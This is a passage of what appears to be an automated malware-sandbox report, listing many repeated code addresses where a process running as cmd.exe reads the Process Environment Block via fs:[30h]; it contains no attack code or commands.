        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031227ED mov eax, dword ptr fs:[00000030h]12_2_031227ED
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031227ED mov eax, dword ptr fs:[00000030h]12_2_031227ED
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03142619 mov eax, dword ptr fs:[00000030h]12_2_03142619
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311260B mov eax, dword ptr fs:[00000030h]12_2_0311260B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311260B mov eax, dword ptr fs:[00000030h]12_2_0311260B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311260B mov eax, dword ptr fs:[00000030h]12_2_0311260B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311260B mov eax, dword ptr fs:[00000030h]12_2_0311260B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311260B mov eax, dword ptr fs:[00000030h]12_2_0311260B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311260B mov eax, dword ptr fs:[00000030h]12_2_0311260B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311260B mov eax, dword ptr fs:[00000030h]12_2_0311260B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317E609 mov eax, dword ptr fs:[00000030h]12_2_0317E609
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03136620 mov eax, dword ptr fs:[00000030h]12_2_03136620
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03138620 mov eax, dword ptr fs:[00000030h]12_2_03138620
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311E627 mov eax, dword ptr fs:[00000030h]12_2_0311E627
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310262C mov eax, dword ptr fs:[00000030h]12_2_0310262C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311C640 mov eax, dword ptr fs:[00000030h]12_2_0311C640
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03132674 mov eax, dword ptr fs:[00000030h]12_2_03132674
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C866E mov eax, dword ptr fs:[00000030h]12_2_031C866E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C866E mov eax, dword ptr fs:[00000030h]12_2_031C866E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313A660 mov eax, dword ptr fs:[00000030h]12_2_0313A660
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313A660 mov eax, dword ptr fs:[00000030h]12_2_0313A660
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03104690 mov eax, dword ptr fs:[00000030h]12_2_03104690
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03104690 mov eax, dword ptr fs:[00000030h]12_2_03104690
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031366B0 mov eax, dword ptr fs:[00000030h]12_2_031366B0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313C6A6 mov eax, dword ptr fs:[00000030h]12_2_0313C6A6
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313A6C7 mov ebx, dword ptr fs:[00000030h]12_2_0313A6C7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313A6C7 mov eax, dword ptr fs:[00000030h]12_2_0313A6C7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317E6F2 mov eax, dword ptr fs:[00000030h]12_2_0317E6F2
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317E6F2 mov eax, dword ptr fs:[00000030h]12_2_0317E6F2
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317E6F2 mov eax, dword ptr fs:[00000030h]12_2_0317E6F2
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317E6F2 mov eax, dword ptr fs:[00000030h]12_2_0317E6F2
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031806F1 mov eax, dword ptr fs:[00000030h]12_2_031806F1
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031806F1 mov eax, dword ptr fs:[00000030h]12_2_031806F1
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03196500 mov eax, dword ptr fs:[00000030h]12_2_03196500
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h]12_2_031D4500
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h]12_2_031D4500
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h]12_2_031D4500
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h]12_2_031D4500
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h]12_2_031D4500
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h]12_2_031D4500
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h]12_2_031D4500
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110535 mov eax, dword ptr fs:[00000030h]12_2_03110535
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110535 mov eax, dword ptr fs:[00000030h]12_2_03110535
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110535 mov eax, dword ptr fs:[00000030h]12_2_03110535
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110535 mov eax, dword ptr fs:[00000030h]12_2_03110535
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110535 mov eax, dword ptr fs:[00000030h]12_2_03110535
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110535 mov eax, dword ptr fs:[00000030h]12_2_03110535
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E53E mov eax, dword ptr fs:[00000030h]12_2_0312E53E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E53E mov eax, dword ptr fs:[00000030h]12_2_0312E53E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E53E mov eax, dword ptr fs:[00000030h]12_2_0312E53E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E53E mov eax, dword ptr fs:[00000030h]12_2_0312E53E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E53E mov eax, dword ptr fs:[00000030h]12_2_0312E53E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03108550 mov eax, dword ptr fs:[00000030h]12_2_03108550
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03108550 mov eax, dword ptr fs:[00000030h]12_2_03108550
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313656A mov eax, dword ptr fs:[00000030h]12_2_0313656A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313656A mov eax, dword ptr fs:[00000030h]12_2_0313656A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313656A mov eax, dword ptr fs:[00000030h]12_2_0313656A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E59C mov eax, dword ptr fs:[00000030h]12_2_0313E59C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03102582 mov eax, dword ptr fs:[00000030h]12_2_03102582
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03102582 mov ecx, dword ptr fs:[00000030h]12_2_03102582
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03134588 mov eax, dword ptr fs:[00000030h]12_2_03134588
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031245B1 mov eax, dword ptr fs:[00000030h]12_2_031245B1
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031245B1 mov eax, dword ptr fs:[00000030h]12_2_031245B1
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031805A7 mov eax, dword ptr fs:[00000030h]12_2_031805A7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031805A7 mov eax, dword ptr fs:[00000030h]12_2_031805A7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031805A7 mov eax, dword ptr fs:[00000030h]12_2_031805A7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031065D0 mov eax, dword ptr fs:[00000030h]12_2_031065D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313A5D0 mov eax, dword ptr fs:[00000030h]12_2_0313A5D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313A5D0 mov eax, dword ptr fs:[00000030h]12_2_0313A5D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E5CF mov eax, dword ptr fs:[00000030h]12_2_0313E5CF
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E5CF mov eax, dword ptr fs:[00000030h]12_2_0313E5CF
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031025E0 mov eax, dword ptr fs:[00000030h]12_2_031025E0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h]12_2_0312E5E7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h]12_2_0312E5E7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h]12_2_0312E5E7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h]12_2_0312E5E7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h]12_2_0312E5E7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h]12_2_0312E5E7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h]12_2_0312E5E7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h]12_2_0312E5E7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313C5ED mov eax, dword ptr fs:[00000030h]12_2_0313C5ED
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313C5ED mov eax, dword ptr fs:[00000030h]12_2_0313C5ED
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03138402 mov eax, dword ptr fs:[00000030h]12_2_03138402
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03138402 mov eax, dword ptr fs:[00000030h]12_2_03138402
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03138402 mov eax, dword ptr fs:[00000030h]12_2_03138402
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FC427 mov eax, dword ptr fs:[00000030h]12_2_030FC427
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FE420 mov eax, dword ptr fs:[00000030h]12_2_030FE420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FE420 mov eax, dword ptr fs:[00000030h]12_2_030FE420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FE420 mov eax, dword ptr fs:[00000030h]12_2_030FE420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03186420 mov eax, dword ptr fs:[00000030h]12_2_03186420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03186420 mov eax, dword ptr fs:[00000030h]12_2_03186420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03186420 mov eax, dword ptr fs:[00000030h]12_2_03186420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03186420 mov eax, dword ptr fs:[00000030h]12_2_03186420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03186420 mov eax, dword ptr fs:[00000030h]12_2_03186420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03186420 mov eax, dword ptr fs:[00000030h]12_2_03186420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03186420 mov eax, dword ptr fs:[00000030h]12_2_03186420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312245A mov eax, dword ptr fs:[00000030h]12_2_0312245A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031BA456 mov eax, dword ptr fs:[00000030h]12_2_031BA456
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h]12_2_0313E443
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h]12_2_0313E443
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h]12_2_0313E443
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h]12_2_0313E443
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h]12_2_0313E443
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h]12_2_0313E443
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h]12_2_0313E443
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h]12_2_0313E443
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030F645D mov eax, dword ptr fs:[00000030h]12_2_030F645D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312A470 mov eax, dword ptr fs:[00000030h]12_2_0312A470
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312A470 mov eax, dword ptr fs:[00000030h]12_2_0312A470
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312A470 mov eax, dword ptr fs:[00000030h]12_2_0312A470
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318C460 mov ecx, dword ptr fs:[00000030h]12_2_0318C460
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031BA49A mov eax, dword ptr fs:[00000030h]12_2_031BA49A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031344B0 mov ecx, dword ptr fs:[00000030h]12_2_031344B0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318A4B0 mov eax, dword ptr fs:[00000030h]12_2_0318A4B0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031064AB mov eax, dword ptr fs:[00000030h]12_2_031064AB
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031004E5 mov ecx, dword ptr fs:[00000030h]12_2_031004E5
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h]12_2_0317EB1D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h]12_2_0317EB1D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h]12_2_0317EB1D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h]12_2_0317EB1D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h]12_2_0317EB1D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h]12_2_0317EB1D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h]12_2_0317EB1D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h]12_2_0317EB1D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h]12_2_0317EB1D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4B00 mov eax, dword ptr fs:[00000030h]12_2_031D4B00
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312EB20 mov eax, dword ptr fs:[00000030h]12_2_0312EB20
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312EB20 mov eax, dword ptr fs:[00000030h]12_2_0312EB20
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C8B28 mov eax, dword ptr fs:[00000030h]12_2_031C8B28
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C8B28 mov eax, dword ptr fs:[00000030h]12_2_031C8B28
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AEB50 mov eax, dword ptr fs:[00000030h]12_2_031AEB50
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D2B57 mov eax, dword ptr fs:[00000030h]12_2_031D2B57
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D2B57 mov eax, dword ptr fs:[00000030h]12_2_031D2B57
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D2B57 mov eax, dword ptr fs:[00000030h]12_2_031D2B57
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D2B57 mov eax, dword ptr fs:[00000030h]12_2_031D2B57
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B4B4B mov eax, dword ptr fs:[00000030h]12_2_031B4B4B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B4B4B mov eax, dword ptr fs:[00000030h]12_2_031B4B4B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A8B42 mov eax, dword ptr fs:[00000030h]12_2_031A8B42
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03196B40 mov eax, dword ptr fs:[00000030h]12_2_03196B40
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03196B40 mov eax, dword ptr fs:[00000030h]12_2_03196B40
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031CAB40 mov eax, dword ptr fs:[00000030h]12_2_031CAB40
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030F8B50 mov eax, dword ptr fs:[00000030h]12_2_030F8B50
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FCB7E mov eax, dword ptr fs:[00000030h]12_2_030FCB7E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B4BB0 mov eax, dword ptr fs:[00000030h]12_2_031B4BB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B4BB0 mov eax, dword ptr fs:[00000030h]12_2_031B4BB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110BBE mov eax, dword ptr fs:[00000030h]12_2_03110BBE
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110BBE mov eax, dword ptr fs:[00000030h]12_2_03110BBE
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AEBD0 mov eax, dword ptr fs:[00000030h]12_2_031AEBD0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03120BCB mov eax, dword ptr fs:[00000030h]12_2_03120BCB
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03120BCB mov eax, dword ptr fs:[00000030h]12_2_03120BCB
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03120BCB mov eax, dword ptr fs:[00000030h]12_2_03120BCB
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03100BCD mov eax, dword ptr fs:[00000030h]12_2_03100BCD
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03100BCD mov eax, dword ptr fs:[00000030h]12_2_03100BCD
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03100BCD mov eax, dword ptr fs:[00000030h]12_2_03100BCD
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03108BF0 mov eax, dword ptr fs:[00000030h]12_2_03108BF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03108BF0 mov eax, dword ptr fs:[00000030h]12_2_03108BF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03108BF0 mov eax, dword ptr fs:[00000030h]12_2_03108BF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318CBF0 mov eax, dword ptr fs:[00000030h]12_2_0318CBF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312EBFC mov eax, dword ptr fs:[00000030h]12_2_0312EBFC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318CA11 mov eax, dword ptr fs:[00000030h]12_2_0318CA11
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03124A35 mov eax, dword ptr fs:[00000030h]12_2_03124A35
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03124A35 mov eax, dword ptr fs:[00000030h]12_2_03124A35
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313CA24 mov eax, dword ptr fs:[00000030h]12_2_0313CA24
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312EA2E mov eax, dword ptr fs:[00000030h]12_2_0312EA2E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h]12_2_03106A50
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h]12_2_03106A50
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h]12_2_03106A50
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h]12_2_03106A50
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h]12_2_03106A50
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h]12_2_03106A50
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h]12_2_03106A50
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110A5B mov eax, dword ptr fs:[00000030h]12_2_03110A5B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110A5B mov eax, dword ptr fs:[00000030h]12_2_03110A5B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317CA72 mov eax, dword ptr fs:[00000030h]12_2_0317CA72
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317CA72 mov eax, dword ptr fs:[00000030h]12_2_0317CA72
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AEA60 mov eax, dword ptr fs:[00000030h]12_2_031AEA60
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313CA6F mov eax, dword ptr fs:[00000030h]12_2_0313CA6F
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313CA6F mov eax, dword ptr fs:[00000030h]12_2_0313CA6F
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313CA6F mov eax, dword ptr fs:[00000030h]12_2_0313CA6F
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03138A90 mov edx, dword ptr fs:[00000030h]12_2_03138A90
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h]12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h]12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h]12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h]12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h]12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h]12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h]12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h]12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h]12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4A80 mov eax, dword ptr fs:[00000030h]12_2_031D4A80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03108AA0 mov eax, dword ptr fs:[00000030h]12_2_03108AA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03108AA0 mov eax, dword ptr fs:[00000030h]12_2_03108AA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03156AA4 mov eax, dword ptr fs:[00000030h]12_2_03156AA4
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03100AD0 mov eax, dword ptr fs:[00000030h]12_2_03100AD0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03134AD0 mov eax, dword ptr fs:[00000030h]12_2_03134AD0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03134AD0 mov eax, dword ptr fs:[00000030h]12_2_03134AD0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03156ACC mov eax, dword ptr fs:[00000030h]12_2_03156ACC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03156ACC mov eax, dword ptr fs:[00000030h]12_2_03156ACC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03156ACC mov eax, dword ptr fs:[00000030h]12_2_03156ACC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313AAEE mov eax, dword ptr fs:[00000030h]12_2_0313AAEE
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313AAEE mov eax, dword ptr fs:[00000030h]12_2_0313AAEE
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318C912 mov eax, dword ptr fs:[00000030h]12_2_0318C912
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030F8918 mov eax, dword ptr fs:[00000030h]12_2_030F8918
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030F8918 mov eax, dword ptr fs:[00000030h]12_2_030F8918
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317E908 mov eax, dword ptr fs:[00000030h]12_2_0317E908
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317E908 mov eax, dword ptr fs:[00000030h]12_2_0317E908
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318892A mov eax, dword ptr fs:[00000030h]12_2_0318892A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0319892B mov eax, dword ptr fs:[00000030h]12_2_0319892B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4940 mov eax, dword ptr fs:[00000030h]12_2_031D4940
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03180946 mov eax, dword ptr fs:[00000030h]12_2_03180946
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A4978 mov eax, dword ptr fs:[00000030h]12_2_031A4978
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A4978 mov eax, dword ptr fs:[00000030h]12_2_031A4978
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318C97C mov eax, dword ptr fs:[00000030h]12_2_0318C97C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03126962 mov eax, dword ptr fs:[00000030h]12_2_03126962
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03126962 mov eax, dword ptr fs:[00000030h]12_2_03126962
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03126962 mov eax, dword ptr fs:[00000030h]12_2_03126962
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0314096E mov eax, dword ptr fs:[00000030h]12_2_0314096E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0314096E mov edx, dword ptr fs:[00000030h]12_2_0314096E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0314096E mov eax, dword ptr fs:[00000030h]12_2_0314096E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031889B3 mov esi, dword ptr fs:[00000030h]12_2_031889B3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031889B3 mov eax, dword ptr fs:[00000030h]12_2_031889B3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031889B3 mov eax, dword ptr fs:[00000030h]12_2_031889B3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
